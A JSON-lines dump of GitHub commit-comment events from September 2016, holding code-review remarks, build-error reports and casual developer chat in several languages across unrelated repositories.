{"id":"4628747070","type":"CommitCommentEvent","actor":{"login":"mihirsv"},"repo":{"name":"BatchC/MailingSystem"},"payload":{"comment":{"id":19202797,"position":null,"line":null,"path":null,"commit_id":"5708072acb4aabf14499e583546f2d312e9bc935","created_at":"2016-09-28T06:29:49Z","updated_at":"2016-09-28T06:29:49Z","body":"😢😢 admob me error aa raha hai\n\nOn 28-Sep-2016 11:58 am, \"Rohit Nahata\" <notifications@github.com> wrote:\n\n> Mein tera JSON file badme use karunga 👊\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/BatchC/MailingSystem/commit/5708072acb4aabf14499e583546f2d312e9bc935#commitcomment-19202781>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AOYTZoEe2MzB6YuWEh5FUY40IEPQmKRMks5qugkXgaJpZM4KIdY_>\n> .\n>\n"}},"created_at":"2016-09-28T06:29:49Z"}
{"id":"4628748904","type":"CommitCommentEvent","actor":{"login":"alanrussian"},"repo":{"name":"rienafairefr/nYNABapi"},"payload":{"comment":{"id":19202800,"position":5,"line":5,"path":"pynYNAB/Entity.py","commit_id":"c9ce123a1140a581c1b658e47f0c0f7de2d03961","created_at":"2016-09-28T06:30:22Z","updated_at":"2016-09-28T06:30:22Z","body":"Was this accidentally added to this commit? I don't think aenum is a thing, and it doesn't run with aenum. Thanks!"}},"created_at":"2016-09-28T06:30:22Z"}
{"id":"4628751254","type":"CommitCommentEvent","actor":{"login":"rohitnahata"},"repo":{"name":"BatchC/MailingSystem"},"payload":{"comment":{"id":19202805,"position":null,"line":null,"path":null,"commit_id":"5708072acb4aabf14499e583546f2d312e9bc935","created_at":"2016-09-28T06:31:02Z","updated_at":"2016-09-28T06:31:02Z","body":"kya error?\r\n"}},"created_at":"2016-09-28T06:31:02Z"}
{"id":"4628755125","type":"CommitCommentEvent","actor":{"login":"SnelleJelle"},"repo":{"name":"SnelleJelle/WebShare"},"payload":{"comment":{"id":19202819,"position":null,"line":null,"path":null,"commit_id":"f43dba87a1cc6ec7246c4078aa9ff7f6044927a9","created_at":"2016-09-28T06:32:16Z","updated_at":"2016-09-28T06:32:16Z","body":"kewl\r\n"}},"created_at":"2016-09-28T06:32:16Z"}
{"id":"4628755497","type":"CommitCommentEvent","actor":{"login":"Pitastic"},"repo":{"name":"janleck/TempPi"},"payload":{"comment":{"id":19202821,"position":2,"line":26,"path":"README.md","commit_id":"670e00e88e81ab2fe2c37919645a20f19afb31f9","created_at":"2016-09-28T06:32:22Z","updated_at":"2016-09-28T06:32:22Z","body":"Diese und Zeile 21 sollte als h4 (\\####)"}},"created_at":"2016-09-28T06:32:22Z"}
{"id":"4628755828","type":"CommitCommentEvent","actor":{"login":"SnelleJelle"},"repo":{"name":"SnelleJelle/WebShare"},"payload":{"comment":{"id":19202823,"position":null,"line":null,"path":null,"commit_id":"3f48ca399406990440210024c8a704f7a5d161ea","created_at":"2016-09-28T06:32:29Z","updated_at":"2016-09-28T06:32:29Z","body":"ez pz"}},"created_at":"2016-09-28T06:32:29Z"}
{"id":"4628757597","type":"CommitCommentEvent","actor":{"login":"SnelleJelle"},"repo":{"name":"SnelleJelle/WebShare"},"payload":{"comment":{"id":19202827,"position":19,"line":24,"path":"Server/Client.cs","commit_id":"1df0f46409e05e4f54254c8f229c131a6f17aad8","created_at":"2016-09-28T06:33:00Z","updated_at":"2016-09-28T06:33:00Z","body":"it's fine"}},"created_at":"2016-09-28T06:33:00Z"}
{"id":"4628758264","type":"CommitCommentEvent","actor":{"login":"piernov"},"repo":{"name":"NassimBounouas/BRAINF-CK_SI3"},"payload":{"comment":{"id":19202830,"position":6,"line":6,"path":"README.md","commit_id":"27a29dc3d6ed158e2d34b4b1fb8a5a43d7671906","created_at":"2016-09-28T06:33:13Z","updated_at":"2016-09-28T06:33:13Z","body":"\r\n    javac -d build/classes -cp build/classes:/usr/share/java/junit.jar `find src -name \\*.java`\r\n"}},"created_at":"2016-09-28T06:33:13Z"}
{"id":"4628758933","type":"CommitCommentEvent","actor":{"login":"arkanoryn"},"repo":{"name":"arkanoryn/todo_app"},"payload":{"comment":{"id":19202833,"position":14,"line":14,"path":"web/controllers/todo_controller.ex","commit_id":"be9fb80119f0bab16e56c4ad97e8dcf272674116","created_at":"2016-09-28T06:33:26Z","updated_at":"2016-09-28T06:33:26Z","body":"Would you use a microservice to create the Todo?\r\nWould the microservice also save the model in the database?"}},"created_at":"2016-09-28T06:33:26Z"}
{"id":"4628758957","type":"CommitCommentEvent","actor":{"login":"SnelleJelle"},"repo":{"name":"SnelleJelle/WebShare"},"payload":{"comment":{"id":19202835,"position":8,"line":90,"path":"Server/HttpServer.cs","commit_id":"1df0f46409e05e4f54254c8f229c131a6f17aad8","created_at":"2016-09-28T06:33:27Z","updated_at":"2016-09-28T06:33:27Z","body":"refactor into hostname function/class"}},"created_at":"2016-09-28T06:33:27Z"}
{"id":"4628759535","type":"CommitCommentEvent","actor":{"login":"mihirsv"},"repo":{"name":"BatchC/MailingSystem"},"payload":{"comment":{"id":19202836,"position":null,"line":null,"path":null,"commit_id":"5708072acb4aabf14499e583546f2d312e9bc935","created_at":"2016-09-28T06:33:39Z","updated_at":"2016-09-28T06:33:39Z","body":"Build ho raha hai par run kiya to error dikhata hai.\nError:Error converting bytecode to dex:\nCause: com.android.dex.DexException: Multiple dex files define\nLcom/google/android/gms/internal/zzbq;\n\nError:Execution failed for task ':app:transformClassesWithDexForDebug'.\n> com.android.build.api.transform.TransformException:\ncom.android.ide.common.process.ProcessException:\njava.util.concurrent.ExecutionException:\njava.lang.UnsupportedOperationException\n\nye 2 error\n\nOn 28 September 2016 at 12:01, Rohit Nahata <notifications@github.com>\nwrote:\n\n> kya error?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/BatchC/MailingSystem/commit/5708072acb4aabf14499e583546f2d312e9bc935#commitcomment-19202805>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AOYTZqldDXuGT-XoeYAvRZ03WAS5RzFOks5qugmmgaJpZM4KIdY_>\n> .\n>\n"}},"created_at":"2016-09-28T06:33:39Z"}
{"id":"4628760775","type":"CommitCommentEvent","actor":{"login":"SnelleJelle"},"repo":{"name":"SnelleJelle/WebShare"},"payload":{"comment":{"id":19202838,"position":31,"line":107,"path":"Server/HttpServer.cs","commit_id":"1df0f46409e05e4f54254c8f229c131a6f17aad8","created_at":"2016-09-28T06:34:06Z","updated_at":"2016-09-28T06:34:06Z","body":"k\r\n"}},"created_at":"2016-09-28T06:34:06Z"}
{"id":"4628762868","type":"CommitCommentEvent","actor":{"login":"rohitnahata"},"repo":{"name":"BatchC/MailingSystem"},"payload":{"comment":{"id":19202842,"position":null,"line":null,"path":null,"commit_id":"5708072acb4aabf14499e583546f2d312e9bc935","created_at":"2016-09-28T06:34:47Z","updated_at":"2016-09-28T06:34:47Z","body":"stack ovrerflow?\r\n\r\n"}},"created_at":"2016-09-28T06:34:47Z"}
{"id":"4628766056","type":"CommitCommentEvent","actor":{"login":"dweindl"},"repo":{"name":"ICB-DCM/AMICI"},"payload":{"comment":{"id":19202846,"position":4,"line":34,"path":"@amimodel/generateC.m","commit_id":"d70ff23865a8a19a33ef14a47b161dd3551ae58c","created_at":"2016-09-28T06:35:45Z","updated_at":"2016-09-28T06:35:45Z","body":"Ah, good to know. I always deleted the model...\r\n\r\nMaybe store some checksum of generetaC.m and check if it changed?"}},"created_at":"2016-09-28T06:35:45Z"}
{"id":"4628767235","type":"CommitCommentEvent","actor":{"login":"SnelleJelle"},"repo":{"name":"SnelleJelle/WebShare"},"payload":{"comment":{"id":19202848,"position":65,"line":115,"path":"Server/Settings/SettingsManager.cs","commit_id":"1df0f46409e05e4f54254c8f229c131a6f17aad8","created_at":"2016-09-28T06:36:08Z","updated_at":"2016-09-28T06:36:08Z","body":"use TODO"}},"created_at":"2016-09-28T06:36:08Z"}
{"id":"4628769508","type":"CommitCommentEvent","actor":{"login":"mihirsv"},"repo":{"name":"BatchC/MailingSystem"},"payload":{"comment":{"id":19202855,"position":null,"line":null,"path":null,"commit_id":"5708072acb4aabf14499e583546f2d312e9bc935","created_at":"2016-09-28T06:36:49Z","updated_at":"2016-09-28T06:36:49Z","body":"Rat ko dekha tha.. didn't work.. dekhta hu firse aur kahi\n\nOn 28 September 2016 at 12:04, Rohit Nahata <notifications@github.com>\nwrote:\n\n> stack ovrerflow?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/BatchC/MailingSystem/commit/5708072acb4aabf14499e583546f2d312e9bc935#commitcomment-19202842>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AOYTZokzLIQEUzveqiI-kUTmlLpnplmuks5qugqHgaJpZM4KIdY_>\n> .\n>\n"}},"created_at":"2016-09-28T06:36:49Z"}
{"id":"4628770227","type":"CommitCommentEvent","actor":{"login":"SnelleJelle"},"repo":{"name":"SnelleJelle/WebShare"},"payload":{"comment":{"id":19202856,"position":10,"line":14,"path":"Server/Settings/settings.xml","commit_id":"95b5f730da2daf0a39ae242c3383e38147df5ded","created_at":"2016-09-28T06:37:01Z","updated_at":"2016-09-28T06:37:01Z","body":"waz dis?"}},"created_at":"2016-09-28T06:37:01Z"}
{"id":"4628770798","type":"CommitCommentEvent","actor":{"login":"kkmaity"},"repo":{"name":"kkmaity/Download-and-progress-realtime"},"payload":{"comment":{"id":19202858,"position":1,"line":1,"path":"README.md","commit_id":"ac799cb2dcd9bb1130e06ff99fa7a2a40393d480","created_at":"2016-09-28T06:37:12Z","updated_at":"2016-09-28T06:37:12Z","body":"//download image and show progress while downloading------using download manager\r\n\tpublic void downloadImage(){\r\n\t\tString urlDownload = images;\r\n\t\tDownloadManager.Request request = new DownloadManager.Request(Uri.parse(urlDownload));\r\n\r\n\t\trequest.setDescription(\"HOM\");\r\n\t\trequest.setTitle(\"Download\");\r\n\t\trequest.allowScanningByMediaScanner();\r\n\t\trequest.setNotificationVisibility(DownloadManager.Request.VISIBILITY_VISIBLE);\r\n\t\trequest.setDestinationInExternalPublicDir(Environment.DIRECTORY_DOWNLOADS, \"test.jpg\");\r\n\t\tfinal DownloadManager manager = (DownloadManager) getSystemService(Context.DOWNLOAD_SERVICE);\r\n\t\tfinal long downloadId = manager.enqueue(request);\r\n\t\tnew Thread(new Runnable() {\r\n\t\t\t@Override\r\n\t\t\tpublic void run() {\r\n\t\t\t\t downloading = true;\r\n\t\t\t\twhile (downloading) {\r\n\t\t\t\t\tDownloadManager.Query q = new DownloadManager.Query();\r\n\t\t\t\t\tq.setFilterById(downloadId);\r\n\t\t\t\t\tCursor cursor = manager.query(q);\r\n\t\t\t\t\tcursor.moveToFirst();\r\n\t\t\t\t\tint bytes_downloaded = cursor.getInt(cursor\r\n\t\t\t\t\t\t\t.getColumnIndex(DownloadManager.COLUMN_BYTES_DOWNLOADED_SO_FAR));\r\n\t\t\t\t\tint bytes_total = cursor.getInt(cursor.getColumnIndex(DownloadManager.COLUMN_TOTAL_SIZE_BYTES));\r\n\t\t\t\t\tif (cursor.getInt(cursor.getColumnIndex(DownloadManager.COLUMN_STATUS)) == DownloadManager.STATUS_SUCCESSFUL) {\r\n\t\t\t\t\t\tdownloading = false;\r\n\t\t\t\t\t\tfilePath = cursor.getString(cursor.getColumnIndex(DownloadManager.COLUMN_LOCAL_FILENAME));\r\n\t\t\t\t\t}\r\n\t\t\t\t\tfinal int dl_progress = (int) ((bytes_downloaded * 100l) / bytes_total);\r\n\t\t\t\t\trunOnUiThread(new Runnable() {\r\n\t\t\t\t\t\t@Override\r\n\t\t\t\t\t\tpublic void run() {\r\n\t\t\t\t\t\t\tif(dl_progress==100){\r\n\t\t\t\t\t\t\t\tprogressBar.setProgress((int) dl_progress);\r\n\t\t\t\t\t\t\t\tprogress_text.setText(String.valueOf(dl_progress)+\" %\");\r\n\t\t\t\t\t\t\t\tshowImage(filePath);\r\n\t\t\t\t\t\t\t}else {\r\n\t\t\t\t\t\t\t\tprogressBar.setProgress((int) dl_progress);\r\n\t\t\t\t\t\t\t\tprogress_text.setText(String.valueOf(dl_progress)+\" %\");\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t});\r\n\t\t\t\t\tcursor.close();\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}).start();\r\n\t}\r\n//show image after download is completed\r\n\tpublic void showImage(String file_path){\r\n\t\tprogress_text.setVisibility(View.GONE);\r\n\t\tprogressBar.setVisibility(View.GONE);\r\n\t\tFile imgFile = new  File(file_path);\r\n\t\tif(imgFile.exists()){\r\n\t\t\tBitmap myBitmap = BitmapFactory.decodeFile(imgFile.getAbsolutePath());\r\n\t\t\timgDisplay.setImageBitmap(myBitmap);\r\n\t\t}\r\n\t}"}},"created_at":"2016-09-28T06:37:12Z"}
{"id":"4628771168","type":"CommitCommentEvent","actor":{"login":"jamguozhijun"},"repo":{"name":"yiisoft/yii2-app-advanced"},"payload":{"comment":{"id":19202859,"position":2,"line":2,"path":"backend/config/main.php","commit_id":"b2596e9960c477aac907da53e3a3e4e46efe590c","created_at":"2016-09-28T06:37:19Z","updated_at":"2016-09-28T06:37:19Z","body":"Is this array_merge better to be replaced by yii\\helpers\\ArrayHelper::merge ?"}},"created_at":"2016-09-28T06:37:19Z"}
{"id":"4628773841","type":"CommitCommentEvent","actor":{"login":"liversedge"},"repo":{"name":"GoldenCheetah/GoldenCheetah"},"payload":{"comment":{"id":19202862,"position":null,"line":null,"path":null,"commit_id":"ca6c4ea8d9e7eb2a6ff6fc49320e2ee9f9de879c","created_at":"2016-09-28T06:38:13Z","updated_at":"2016-09-28T06:38:13Z","body":"My apologies for this merge commit, I had not rebased correctly."}},"created_at":"2016-09-28T06:38:13Z"}
{"id":"4628782931","type":"CommitCommentEvent","actor":{"login":"arkanoryn"},"repo":{"name":"arkanoryn/todo_app"},"payload":{"comment":{"id":19202884,"position":9,"line":9,"path":"web/templates/todo/index.html.eex","commit_id":"be9fb80119f0bab16e56c4ad97e8dcf272674116","created_at":"2016-09-28T06:41:02Z","updated_at":"2016-09-28T06:41:02Z","body":"Would you create your view this way, or put everything on a partial?\r\nOr do you prefer to use a \"content_tag :tag\" helper function?"}},"created_at":"2016-09-28T06:41:02Z"}
{"id":"4628784655","type":"CommitCommentEvent","actor":{"login":"arkanoryn"},"repo":{"name":"arkanoryn/todo_app"},"payload":{"comment":{"id":19202889,"position":27,"line":27,"path":"web/templates/todo/index.html.eex","commit_id":"be9fb80119f0bab16e56c4ad97e8dcf272674116","created_at":"2016-09-28T06:41:33Z","updated_at":"2016-09-28T06:41:33Z","body":"Just though I could create a general \"edit_button\" helper.\r\nHow would you have implemented it?"}},"created_at":"2016-09-28T06:41:33Z"}
{"id":"4628789904","type":"CommitCommentEvent","actor":{"login":"bgruening"},"repo":{"name":"conda/conda-build"},"payload":{"comment":{"id":19202899,"position":null,"line":null,"path":null,"commit_id":"39503ec42da8d71d16f9ce4cf050abe507f7b2b9","created_at":"2016-09-28T06:43:15Z","updated_at":"2016-09-28T06:43:15Z","body":"This now results in the following error for some (pre-compiled) binaries.\r\n```\r\nFixing permissions\r\ncannot find section .dynamic\r\nTraceback (most recent call last):\r\n  File \"/home/bag/miniconda2/bin/conda-build\", line 6, in <module>\r\n    sys.exit(conda_build.cli.main_build.main())\r\n  File \"/home/bag/miniconda2/lib/python2.7/site-packages/conda_build/cli/main_build.py\", line 246, in main\r\n    execute(sys.argv[1:])\r\n  File \"/home/bag/miniconda2/lib/python2.7/site-packages/conda_build/cli/main_build.py\", line 238, in execute\r\n    already_built=None, config=config)\r\n  File \"/home/bag/miniconda2/lib/python2.7/site-packages/conda_build/api.py\", line 83, in build\r\n    need_source_download=need_source_download, config=config)\r\n  File \"/home/bag/miniconda2/lib/python2.7/site-packages/conda_build/build.py\", line 1004, in build_tree\r\n    config=recipe_config)\r\n  File \"/home/bag/miniconda2/lib/python2.7/site-packages/conda_build/build.py\", line 714, in build\r\n    croot=config.croot)\r\n  File \"/home/bag/miniconda2/lib/python2.7/site-packages/conda_build/post.py\", line 399, in post_build\r\n    mk_relative(m, f, prefix)\r\n  File \"/home/bag/miniconda2/lib/python2.7/site-packages/conda_build/post.py\", line 366, in mk_relative\r\n    mk_relative_linux(f, prefix=prefix, rpaths=m.get_value('build/rpaths', ['lib']))\r\n  File \"/home/bag/miniconda2/lib/python2.7/site-packages/conda_build/post.py\", line 315, in mk_relative_linux\r\n    existing = check_output([patchelf, '--print-rpath', elf]).decode('utf-8').splitlines()[0]\r\n  File \"/home/bag/miniconda2/lib/python2.7/subprocess.py\", line 574, in check_output\r\n    raise CalledProcessError(retcode, cmd, output=output)\r\nsubprocess.CalledProcessError: Command '['/home/bag/miniconda2/bin/patchelf', '--print-rpath', '/home/bag/miniconda2/conda-bld/searchgui_1475044759195/_b_env_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_pla/share/searchgui-3.1.1-0/resources/Comet/linux/comet.exe']' returned non-zero exit status 1\r\n```"}},"created_at":"2016-09-28T06:43:15Z"}
{"id":"4628792921","type":"CommitCommentEvent","actor":{"login":"ericgio"},"repo":{"name":"ericgio/react-bootstrap-typeahead"},"payload":{"comment":{"id":19202903,"position":null,"line":null,"path":null,"commit_id":"e683fe61d268bcbd0bb5b953fddda6c46e4f3e84","created_at":"2016-09-28T06:44:14Z","updated_at":"2016-09-28T06:44:14Z","body":"The fix is simple, the added code just needs to be moved down below line 155"}},"created_at":"2016-09-28T06:44:14Z"}
{"id":"4628794200","type":"CommitCommentEvent","actor":{"login":"yanjm"},"repo":{"name":"yanjm/pixi-zoom"},"payload":{"comment":{"id":19202904,"position":null,"line":null,"path":null,"commit_id":"89fe28a8edf92cebe0de77e29313c714c2b8f40a","created_at":"2016-09-28T06:44:38Z","updated_at":"2016-09-28T06:44:38Z","body":"Init"}},"created_at":"2016-09-28T06:44:38Z"}
{"id":"4628795291","type":"CommitCommentEvent","actor":{"login":"Alhadis"},"repo":{"name":"Alhadis/REST-GreenWalk"},"payload":{"comment":{"id":19202905,"position":null,"line":null,"path":null,"commit_id":"5c1147729966b76ea4fb92813cde3f9f48052229","created_at":"2016-09-28T06:45:01Z","updated_at":"2016-09-28T06:45:01Z","body":"@pchaigno Erm, any idea why the date of this commit changes when [viewed here](https://github.com/Alhadis/REST-GreenWalk)?"}},"created_at":"2016-09-28T06:45:01Z"}
{"id":"4628798293","type":"CommitCommentEvent","actor":{"login":"hanjoosten"},"repo":{"name":"AmpersandTarski/Ampersand"},"payload":{"comment":{"id":19202906,"position":null,"line":null,"path":null,"commit_id":"68408f9e2e811909032dcfb73eb8c7c4bc7d318d","created_at":"2016-09-28T06:45:53Z","updated_at":"2016-09-28T06:45:53Z","body":"@sjcjoosten , Do you realize that you have broken the development branch with this change? This means we cannot release next friday! Could you please either rollback this change or fix whatever is broken? "}},"created_at":"2016-09-28T06:45:53Z"}
{"id":"4628799351","type":"CommitCommentEvent","actor":{"login":"xVacuum"},"repo":{"name":"Pikselke/McHurtWorld"},"payload":{"comment":{"id":19202908,"position":null,"line":null,"path":null,"commit_id":"491ca9bb24201378b9e09c7ba67e6d9faa71eed8","created_at":"2016-09-28T06:46:13Z","updated_at":"2016-09-28T06:46:13Z","body":"Bardzo słabe nazewnictwo, plugin będzie zapewne duży i po jakims czasie się pogubisz - wiem to.\r\n1. Nie używaj polskich nazw!!!\r\n2. Jak masz listenery, to dawaj na końcu \"Listener\", np. \"PistolListener\"\r\n3. Czemu dzielisz listenery na bronie? Zrób to w jednym PlayerInteractEvent.\r\n4. Backpack* nie Plecak.\r\nReszta pod kodem. Generalnie to słabiutko ;/"}},"created_at":"2016-09-28T06:46:13Z"}
{"id":"4628804104","type":"CommitCommentEvent","actor":{"login":"xVacuum"},"repo":{"name":"Pikselke/McHurtWorld"},"payload":{"comment":{"id":19202924,"position":33,"line":33,"path":"src/pl/pikselke/mchw/Main.java","commit_id":"491ca9bb24201378b9e09c7ba67e6d9faa71eed8","created_at":"2016-09-28T06:47:38Z","updated_at":"2016-09-28T06:47:38Z","body":"To nie `c#`, w javie przywykło się nazywać metody z małej litery. "}},"created_at":"2016-09-28T06:47:38Z"}
{"id":"4628804295","type":"CommitCommentEvent","actor":{"login":"x86poem"},"repo":{"name":"x86poem/2d-creeper"},"payload":{"comment":{"id":19202926,"position":24,"line":116,"path":"2d-creeper v1.0/main.c","commit_id":"ca50a1d6fb43d7f96408a6d12f733e7c432ab998","created_at":"2016-09-28T06:47:41Z","updated_at":"2016-09-28T06:47:41Z","body":"new_creeper(rand() % 80, rand() %24);\r\n는 어떨까요?\r\nx와 y값이 너무 커지지 않도록 해주는 거죠"}},"created_at":"2016-09-28T06:47:41Z"}
{"id":"4628807456","type":"CommitCommentEvent","actor":{"login":"xVacuum"},"repo":{"name":"Pikselke/McHurtWorld"},"payload":{"comment":{"id":19202930,"position":19,"line":19,"path":"src/pl/pikselke/mchw/Main.java","commit_id":"491ca9bb24201378b9e09c7ba67e6d9faa71eed8","created_at":"2016-09-28T06:48:38Z","updated_at":"2016-09-28T06:48:38Z","body":"Słyszałes kiedys o hermetyzacji danych? \r\nPo drugie, czemu jak masz `public static` to masz też metode `getPlugin()`? To idiotyzm, bo można `Main.plugin` i `Main.getPlugin()`...\r\n\r\nZamień na `private static Main plugin;`"}},"created_at":"2016-09-28T06:48:38Z"}
{"id":"4628808637","type":"CommitCommentEvent","actor":{"login":"hanjoosten"},"repo":{"name":"AmpersandTarski/Ampersand"},"payload":{"comment":{"id":19202931,"position":null,"line":null,"path":null,"commit_id":"68408f9e2e811909032dcfb73eb8c7c4bc7d318d","created_at":"2016-09-28T06:48:59Z","updated_at":"2016-09-28T06:48:59Z","body":"This is about [this travis build](https://travis-ci.org/AmpersandTarski/Ampersand/jobs/163234050)"}},"created_at":"2016-09-28T06:48:59Z"}
{"id":"4628808692","type":"CommitCommentEvent","actor":{"login":"gdb"},"repo":{"name":"openai/gym"},"payload":{"comment":{"id":19202932,"position":15,"line":47,"path":"gym/envs/registration.py","commit_id":"3cd5b4038b9cae032d558348d6ed4d89e63a48cb","created_at":"2016-09-28T06:49:00Z","updated_at":"2016-09-28T06:49:00Z","body":"I usually prefer to write this as:\r\n\r\n```\r\nif tags is None:\r\n  tags = {}\r\nself.tags = tags\r\n```\r\n\r\nSmall thing, but that way it's clearer that the assignment happens the same way in both cases, you're just changing the default value."}},"created_at":"2016-09-28T06:49:00Z"}
{"id":"4628808726","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"7yon/C_SharpCourse"},"payload":{"comment":{"id":19202934,"position":68,"line":88,"path":"TheAreaOfATriangle/TheAreaOfATriangle/Triangle.cs","commit_id":"2f860f45adc3f4cb0f9d1546dd17b61a8984623c","created_at":"2016-09-28T06:49:01Z","updated_at":"2016-09-28T06:49:01Z","body":"Так, вы либо возвращайте значение (Тогда лучше метод начать с Get) и не меняйте состояние объекта\r\nИли меняйте состояние объекта, но не возвращайте значение"}},"created_at":"2016-09-28T06:49:01Z"}
{"id":"4628808805","type":"CommitCommentEvent","actor":{"login":"xVacuum"},"repo":{"name":"Pikselke/McHurtWorld"},"payload":{"comment":{"id":19202935,"position":22,"line":22,"path":"src/pl/pikselke/mchw/Main.java","commit_id":"491ca9bb24201378b9e09c7ba67e6d9faa71eed8","created_at":"2016-09-28T06:49:02Z","updated_at":"2016-09-28T06:49:02Z","body":"`PRACE`? "}},"created_at":"2016-09-28T06:49:02Z"}
{"id":"4628808898","type":"CommitCommentEvent","actor":{"login":"RussellBradley"},"repo":{"name":"Ritiek/Spotify-Downloader"},"payload":{"comment":{"id":19202936,"position":null,"line":null,"path":null,"commit_id":"1ed466115b84bed58353a32fd869ee78fd33e81b","created_at":"2016-09-28T06:49:04Z","updated_at":"2016-09-28T06:49:04Z","body":"+1 whoops - included that pip install originally before each module. \r\nGoing too fast! Sorry about that @Ritiek "}},"created_at":"2016-09-28T06:49:04Z"}
{"id":"4628809674","type":"CommitCommentEvent","actor":{"login":"dPramod"},"repo":{"name":"ericgio/react-bootstrap-typeahead"},"payload":{"comment":{"id":19202939,"position":null,"line":null,"path":null,"commit_id":"e683fe61d268bcbd0bb5b953fddda6c46e4f3e84","created_at":"2016-09-28T06:49:17Z","updated_at":"2016-09-28T06:49:17Z","body":"Oh.. That's true . :-) Thank's a lot !! "}},"created_at":"2016-09-28T06:49:17Z"}
{"id":"4628810099","type":"CommitCommentEvent","actor":{"login":"xVacuum"},"repo":{"name":"Pikselke/McHurtWorld"},"payload":{"comment":{"id":19202940,"position":41,"line":41,"path":"src/pl/pikselke/mchw/Main.java","commit_id":"491ca9bb24201378b9e09c7ba67e6d9faa71eed8","created_at":"2016-09-28T06:49:24Z","updated_at":"2016-09-28T06:49:24Z","body":"Zrób jeden listener `PlayerInteractListener` a w nim `PlayerInteractEvent` i te wszystkie metody..."}},"created_at":"2016-09-28T06:49:24Z"}
{"id":"4628811001","type":"CommitCommentEvent","actor":{"login":"xVacuum"},"repo":{"name":"Pikselke/McHurtWorld"},"payload":{"comment":{"id":19202941,"position":44,"line":44,"path":"src/pl/pikselke/mchw/Main.java","commit_id":"491ca9bb24201378b9e09c7ba67e6d9faa71eed8","created_at":"2016-09-28T06:49:40Z","updated_at":"2016-09-28T06:49:40Z","body":"Umarłem kurwa.\r\n\r\n`CreateReszte`? Cos ci sie kurwa pojebało xDDDDDD"}},"created_at":"2016-09-28T06:49:40Z"}
{"id":"4628811171","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"7yon/C_SharpCourse"},"payload":{"comment":{"id":19202942,"position":20,"line":30,"path":"TheAreaOfATriangle/FinderSides.Tests/TriangleTest.cs","commit_id":"2f860f45adc3f4cb0f9d1546dd17b61a8984623c","created_at":"2016-09-28T06:49:43Z","updated_at":"2016-09-28T06:49:43Z","body":"using TheAreaOfATriangle; в начало файла\r\nиз самого файла префикс TheAreaOfATriangle убрать"}},"created_at":"2016-09-28T06:49:43Z"}
{"id":"4628811473","type":"CommitCommentEvent","actor":{"login":"xVacuum"},"repo":{"name":"Pikselke/McHurtWorld"},"payload":{"comment":{"id":19202943,"position":3,"line":3,"path":"src/pl/pikselke/mchw/bag/Plecak.java","commit_id":"491ca9bb24201378b9e09c7ba67e6d9faa71eed8","created_at":"2016-09-28T06:49:49Z","updated_at":"2016-09-28T06:49:49Z","body":"Backpack*"}},"created_at":"2016-09-28T06:49:49Z"}
{"id":"4628811911","type":"CommitCommentEvent","actor":{"login":"davidfowl"},"repo":{"name":"dotnet/corefxlab"},"payload":{"comment":{"id":19202944,"position":null,"line":null,"path":null,"commit_id":"292ea78eecb4b6ec7cc35d7e4c59a010cf59fd54","created_at":"2016-09-28T06:49:57Z","updated_at":"2016-09-28T06:49:57Z","body":"/cc @KrzysztofCwalina "}},"created_at":"2016-09-28T06:49:57Z"}
{"id":"4628813011","type":"CommitCommentEvent","actor":{"login":"xVacuum"},"repo":{"name":"Pikselke/McHurtWorld"},"payload":{"comment":{"id":19202946,"position":21,"line":21,"path":"src/pl/pikselke/mchw/craftings/CraftingInventory1.java","commit_id":"491ca9bb24201378b9e09c7ba67e6d9faa71eed8","created_at":"2016-09-28T06:50:16Z","updated_at":"2016-09-28T06:50:16Z","body":"`ChatColor.translateAlternateColorCodes('&', \"&7Narzedzia\");\r\nitd."}},"created_at":"2016-09-28T06:50:16Z"}
{"id":"4628813821","type":"CommitCommentEvent","actor":{"login":"xVacuum"},"repo":{"name":"Pikselke/McHurtWorld"},"payload":{"comment":{"id":19202950,"position":17,"line":17,"path":"src/pl/pikselke/mchw/craftings/CraftingInventory1.java","commit_id":"491ca9bb24201378b9e09c7ba67e6d9faa71eed8","created_at":"2016-09-28T06:50:27Z","updated_at":"2016-09-28T06:50:27Z","body":"Za każdym razem nowe inventory, no nieźle..."}},"created_at":"2016-09-28T06:50:27Z"}
{"id":"4628814177","type":"CommitCommentEvent","actor":{"login":"x86poem"},"repo":{"name":"x86poem/2d-creeper"},"payload":{"comment":{"id":19202951,"position":22,"line":114,"path":"2d-creeper v1.0/main.c","commit_id":"ca50a1d6fb43d7f96408a6d12f733e7c432ab998","created_at":"2016-09-28T06:50:34Z","updated_at":"2016-09-28T06:50:34Z","body":"for(int i =0; i<creeper;i++)\r\n로하면 creeper에 0이 들어가도 될거같네요\r\n"}},"created_at":"2016-09-28T06:50:34Z"}
{"id":"4628816235","type":"CommitCommentEvent","actor":{"login":"xVacuum"},"repo":{"name":"Pikselke/McHurtWorld"},"payload":{"comment":{"id":19202955,"position":70,"line":70,"path":"src/pl/pikselke/mchw/craftings/CraftingInventory1.java","commit_id":"491ca9bb24201378b9e09c7ba67e6d9faa71eed8","created_at":"2016-09-28T06:51:09Z","updated_at":"2016-09-28T06:51:09Z","body":"O czyms takim jak `for` słyszałes? W twoim przypadku da się to bardzo łatwo zrobić zaoszczędzając mocne 50 linijek kodu."}},"created_at":"2016-09-28T06:51:09Z"}
{"id":"4628817494","type":"CommitCommentEvent","actor":{"login":"xVacuum"},"repo":{"name":"Pikselke/McHurtWorld"},"payload":{"comment":{"id":19202959,"position":33,"line":33,"path":"src/pl/pikselke/mchw/craftings/listeners/InventoryClick.java","commit_id":"491ca9bb24201378b9e09c7ba67e6d9faa71eed8","created_at":"2016-09-28T06:51:29Z","updated_at":"2016-09-28T06:51:29Z","body":"`for`\r\nitd."}},"created_at":"2016-09-28T06:51:29Z"}
